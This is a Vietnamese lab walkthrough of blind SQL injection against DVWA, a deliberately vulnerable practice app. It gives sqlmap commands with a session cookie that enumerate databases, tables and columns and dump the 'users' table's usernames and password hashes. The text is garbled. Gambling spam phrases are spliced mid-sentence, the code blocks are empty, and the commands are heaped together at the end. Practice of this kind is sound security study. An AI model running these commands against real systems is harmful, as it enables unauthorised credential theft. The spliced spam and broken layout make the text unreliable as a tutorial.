Trong quá trình làm việc với tài liệu trên nền tảng Zhi Xin, tôi nhận thấy rằng hình ảnh không thể tải được. Sau khi kiểm tra mã nguồn, tôi phát hiện ra rằng các hình ảnh này liên kết đến bên ngoài và đã khôi phục thành công.
Khởi động OWASP靶 máy chủ và Kali Virtual Machine
Đăng nhập vào hệ thống DVWA (Damn Vulnerable Web Application). Để thực hiện các bài tập, cần điều chỉnh mức độ an toàn xuống mức “low” để tạo môi trường dễ dàng hơn cho việc thực hành.
Sau khi đăng nhập, truy cập vào trang SQL Injection (Blind). Tôi thử nghiệm bằng cách nhập một số bất kỳ và nhấn nút “Submit”. Kết quả trả về là dự đoán ban đầu của chúng ta về việc có hay không sự tồn tại của lỗ hổng SQL Injection.
Cài đặt SQLmap
Vì tôi sử dụng máy vật lý làm máy tấn công, nên tôi đã cài đặt SQLmap để hỗ trợ quá trình phân tích và khai thác lỗ hổng.
Sử dụng F12 mở công cụ phát triển
Bằng cách nhấn phím F12, bạn sẽ mở được công cụ phát triển của trình duyệt. Tại đây, chọn thẻ Storage (Lưu trữ), tìm đến phần cookies và sao chép giá trị của PHPSESSID. Giá trị mà tôi thu được là: 59mb9spqvkd9cuk543thagtsd5
.
Do phương thức gửi dữ liệu của trình duyệt là kiểu GET, nên trong lệnh SQLmap cần sử dụng tham số -u
. Lệnh cơ bản sẽ trông như sau:
|
|
Tuy nhiên, tôi gặp lỗi khi chạy lệnh này. Sau khi kiểm tra tài liệu README trên GitHub, tôi nhận ra rằng cần thêm từ khóa python
trước tên lệnh để chạy đúng phiên bản Python tương thích.
Tìm kiếm các database có sẵn
Để liệt kê tất cả các database, sử dụng lệnh sau:
|
|
Tiếp theo, để xem database hiện tại đang được sử dụng, sử j8bet com dụng lệnh:
|
|
Để liệt kê tất cả bảng trong database “dvwa”, sử dụng lệnh:
|
|
Sau đó, để xem các cột trong bảng “users”, sử dụng lệnh:
|
|
Cuối cùng, để j88 online lấy thông tin từ hai cột “user” và “password” trong bảng “users”, sử dụng lệnh: 77 bet game ``` python sqlmap.py -u “URL” –cookie=“security=low;PHPSESSID=59mb9spqvkd9cuk543thagtsd5” –batch -D dvwa -T users -C"user,password" –dump
|
|
python sqlmap.py -u “URL” –cookie=“security=low;PHPSESSID=59mb9spqvkd9cuk543thagtsd5” –batch –dbs
|
|
python sqlmap.py -u “URL” –cookie=“security=low;PHPSESSID=59mb9spqvkd9cuk543thagtsd5” –batch –current-db
|
|
python sqlmap.py -u “URL” –cookie=“security=low;PHPSESSID=59mb9spqvkd9cuk543thagtsd5” –batch -D dvwa –tables
|
|
python sqlmap.py -u “URL” –cookie=“security=low;PHPSESSID=59mb9spqvkd9cuk543thagtsd5” –batch -D dvwa -T users –columns
|
|
python sqlmap.py -u “URL” –cookie=“security=low;PHPSESSID=59mb9spqvkd9cuk543thagtsd5” –batch -D dvwa -T users -C"user,password" –dump
|
|